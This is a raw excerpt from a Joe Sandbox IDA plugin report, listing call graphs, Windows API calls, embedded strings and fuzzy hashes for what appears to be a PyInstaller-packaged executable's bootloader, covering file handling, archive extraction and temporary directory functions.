19025->19027 19028 7ff7f25043d4 _fread_nolock 11 API calls 19026->19028 19027->19026 19029 7ff7f2504982 CreateFileW 19027->19029 19030 7ff7f2504957 19028->19030 19031 7ff7f25049b6 19029->19031 19032 7ff7f25049ec 19029->19032 19034 7ff7f25043f4 memcpy_s 11 API calls 19030->19034 19050 7ff7f2504a8c GetFileType 19031->19050 19076 7ff7f2504f14 19032->19076 19037 7ff7f250495f 19034->19037 19041 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19037->19041 19039 7ff7f25049f5 19044 7ff7f2504368 _fread_nolock 11 API calls 19039->19044 19040 7ff7f2504a20 19097 7ff7f2504cd4 19040->19097 19046 7ff7f250496a 19041->19046 19042 7ff7f25049e1 CloseHandle 19042->19046 19043 7ff7f25049cb CloseHandle 19043->19046 19049 7ff7f25049ff 19044->19049 19049->19046 19051 7ff7f2504ada 19050->19051 19052 7ff7f2504b97 19050->19052 19053 7ff7f2504b06 GetFileInformationByHandle 19051->19053 19056 7ff7f2504e10 21 API calls 19051->19056 19054 7ff7f2504bc1 19052->19054 19055 7ff7f2504b9f 19052->19055 19057 7ff7f2504bb2 GetLastError 19053->19057 19058 7ff7f2504b2f 19053->19058 19060 7ff7f2504be4 PeekNamedPipe 19054->19060 19075 7ff7f2504b82 19054->19075 19055->19057 19059 7ff7f2504ba3 19055->19059 19061 7ff7f2504af4 19056->19061 19064 7ff7f2504368 _fread_nolock 11 API calls 19057->19064 19062 7ff7f2504cd4 51 API calls 19058->19062 19063 7ff7f25043f4 memcpy_s 11 API calls 19059->19063 19060->19075 19061->19053 19061->19075 19066 7ff7f2504b3a 19062->19066 19063->19075 19064->19075 19065 7ff7f24fb870 _log10_special 8 API calls 19067 7ff7f25049c4 19065->19067 19114 7ff7f2504c34 19066->19114 19067->19042 19067->19043 19070 7ff7f2504c34 10 API calls 19071 7ff7f2504b59 19070->19071 19072 7ff7f2504c34 10 API calls 19071->19072 19073 7ff7f2504b6a 19072->19073 19074 7ff7f25043f4 memcpy_s 11 API calls 19073->19074 19073->19075 19074->19075 19075->19065 19077 7ff7f2504f4a 19076->19077 19078 7ff7f2504fe2 __vcrt_freefls 19077->19078 19079 7ff7f25043f4 memcpy_s 11 API calls 19077->19079 19080 7ff7f24fb870 
_log10_special 8 API calls 19078->19080 19081 7ff7f2504f5c 19079->19081 19082 7ff7f25049f1 19080->19082 19083 7ff7f25043f4 memcpy_s 11 API calls 19081->19083 19082->19039 19082->19040 19084 7ff7f2504f64 19083->19084 19085 7ff7f2507118 45 API calls 19084->19085 19086 7ff7f2504f79 19085->19086 19087 7ff7f2504f81 19086->19087 19088 7ff7f2504f8b 19086->19088 19089 7ff7f25043f4 memcpy_s 11 API calls 19087->19089 19090 7ff7f25043f4 memcpy_s 11 API calls 19088->19090 19094 7ff7f2504f86 19089->19094 19091 7ff7f2504f90 19090->19091 19091->19078 19092 7ff7f25043f4 memcpy_s 11 API calls 19091->19092 19093 7ff7f2504f9a 19092->19093 19095 7ff7f2507118 45 API calls 19093->19095 19094->19078 19096 7ff7f2504fd4 GetDriveTypeW 19094->19096 19095->19094 19096->19078 19099 7ff7f2504cfc 19097->19099 19098 7ff7f2504a2d 19107 7ff7f2504e10 19098->19107 19099->19098 19121 7ff7f250ea34 19099->19121 19101 7ff7f2504d90 19101->19098 19102 7ff7f250ea34 51 API calls 19101->19102 19103 7ff7f2504da3 19102->19103 19103->19098 19104 7ff7f250ea34 51 API calls 19103->19104 19105 7ff7f2504db6 19104->19105 19105->19098 19106 7ff7f250ea34 51 API calls 19105->19106 19106->19098 19108 7ff7f2504e2a 19107->19108 19109 7ff7f2504e61 19108->19109 19110 7ff7f2504e3a 19108->19110 19112 7ff7f250e8c8 21 API calls 19109->19112 19111 7ff7f2504e4a 19110->19111 19113 7ff7f2504368 _fread_nolock 11 API calls 19110->19113 19111->19049 19112->19111 19113->19111 19115 7ff7f2504c50 19114->19115 19116 7ff7f2504c5d FileTimeToSystemTime 19114->19116 19115->19116 19118 7ff7f2504c58 19115->19118 19117 7ff7f2504c71 SystemTimeToTzSpecificLocalTime 19116->19117 19116->19118 19117->19118 19119 7ff7f24fb870 _log10_special 8 API calls 19118->19119 19120 7ff7f2504b49 19119->19120 19120->19070 19122 7ff7f250ea65 19121->19122 19123 7ff7f250ea41 19121->19123 19126 7ff7f250ea9f 19122->19126 19129 7ff7f250eabe 19122->19129 19123->19122 19124 7ff7f250ea46 19123->19124 19125 7ff7f25043f4 memcpy_s 11 API calls 19124->19125 19127 7ff7f250ea4b 
19125->19127 19128 7ff7f25043f4 memcpy_s 11 API calls 19126->19128 19131 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19127->19131 19132 7ff7f250eaa4 19128->19132 19130 7ff7f2504178 45 API calls 19129->19130 19137 7ff7f250eacb 19130->19137 19133 7ff7f250ea56 19131->19133 19134 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19132->19134 19133->19101 19135 7ff7f250eaaf 19134->19135 19135->19101 19136 7ff7f250f7ec 51 API calls 19136->19137 19137->19135 19137->19136

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
• API String ID: 514040917-585287483
• Opcode ID: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
• Instruction ID: a4aa5a4a43c950fc3886f9cd66a523b6d8e780c56e05bab32feb431cce9da3dd
• Opcode Fuzzy Hash: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
• Instruction Fuzzy Hash: D0F18F61B0868291FB19FB21D5542F9E691AFC4790FC44032DA3D476D6EFECE958C3A0

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction ID: 3cbf4503965cb128aa42080bdeb265713192ca82c54d0d19f36e789eefb09782
• Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction Fuzzy Hash: 35C1E236B28A4286EB10EF68C4902BC7761FB49BA8F811275DE2E577E4DF78D451C390

APIs
• FindFirstFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7A1B
• RemoveDirectoryW.KERNEL32(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7A9E
• DeleteFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ABD
• FindNextFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ACB
• FindClose.KERNEL32(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ADC
• RemoveDirectoryW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7AE5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
• Instruction ID: 264cb77d4d863264eb859bd86d2396ec5c8ae394cb436334f2d4df1fa1dbbac1
• Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
• Instruction Fuzzy Hash: DB418325A0CA4291EB20BB24E8545B9A361FBD8754FC10236D97D436C4DFFCDA4AC791
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                        • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction ID: 39b7f9bc70126979e57ebdeaa6daa6e35a377f44b5645a3a255ecddea790f903
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2F0C822A1874186F7609F60B458776B350AB84728F840335D97D076D4CFBCE459CA40
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                        • Opcode ID: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                        • Instruction ID: 0b7c83e149b479713cab8bb8bb14fcae93c2cb7203f20ca24db32a9ed301e9a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C029C22B1D68381EB55FF11A805279A681BF41BA0FC456B5DD7D873D2EEBCE841C3A0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock$Message
                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 677216364-3497178890
                                                                                                                                                                                                                        • Opcode ID: c460ef6f806719c799c4882e24929e883d57d343d479ef8eebcdd9f4951844bd
                                                                                                                                                                                                                        • Instruction ID: 0792f8ad538d8e10a7e5c892c8f3cfba8ad72236d433cbe544a5f205c863bd92
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c460ef6f806719c799c4882e24929e883d57d343d479ef8eebcdd9f4951844bd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A071A231B1868685EB20FF18D4506B9A3A0FB88784F845035D9BD477D9EFECE945CBA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                        • Opcode ID: 6320216ecf1ab69767b89908fb41d25bf920ee1ae2704caaac93011c15bf4516
                                                                                                                                                                                                                        • Instruction ID: b8e2c31a8a8321951181953fb5637ca8512fb97172c2462163909c6db0945539
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6320216ecf1ab69767b89908fb41d25bf920ee1ae2704caaac93011c15bf4516
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B951BD21B08A4392EB10BB11A9505B9A3A0BF84BA4FC40131ED3D076D5EFFCE945CBA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                        • API String ID: 2895956056-699529898
                                                                                                                                                                                                                        • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction ID: 3315193e8ad8b1f1d1671e57bcceed36589ca0ccbeae0a6f43d3aff06a7877bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641FF31A0878281DB20AF64E8552AEA2A1FBC9370F900735E6BD477D5DFBCD545CB90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                        • Opcode ID: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                                                                                                                                                        • Instruction ID: 8d6d9a6c58a651a3fa4445c53220ff842bcc998376b88ad0a511dc50684a7022
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A251C322A0864281EB60BB15A8503BAA291FFC4794FC44135ED7D47BD5EFFCE945CBA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F250E3BA,?,?,-00000018,00007FF7F250A063,?,?,?,00007FF7F2509F5A,?,?,?,00007FF7F250524E), ref: 00007FF7F250E19C
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F250E3BA,?,?,-00000018,00007FF7F250A063,?,?,?,00007FF7F2509F5A,?,?,?,00007FF7F250524E), ref: 00007FF7F250E1A8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                        • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction ID: 6232312300bd06d78866d4265c4e3b3748be22ef13b8b5dbf2faf8539ecdbe60
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00410231B1961381EB19EF12AC00675B292BF45BA0F985175DD2D877C4EEBCE805C3A0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F7CE4
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F7D2C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7E10: GetEnvironmentVariableW.KERNEL32(00007FF7F24F365F), ref: 00007FF7F24F7E47
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F24F7E69
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2507548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F2507561
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F26C0: MessageBoxW.USER32 ref: 00007FF7F24F2736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                        • API String ID: 740614611-1339014028
                                                                                                                                                                                                                        • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction ID: 516b33587d0804e04fd53167681af8d33e641a06bf89c1b8f96d020f29fb29ce
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C416915B0968281FB20FF6199512F99291AF89B90FC04031EE3D577D6EEFCE900C2E1

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction ID: adf651541fe2b477d03b6f0a77adb144b39afd39361087d4c26c0db33254fdda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C1E422A0C68752EB60EF5598602BEB751FB90B80F950171DA6E077D1EFFCE855C3A0

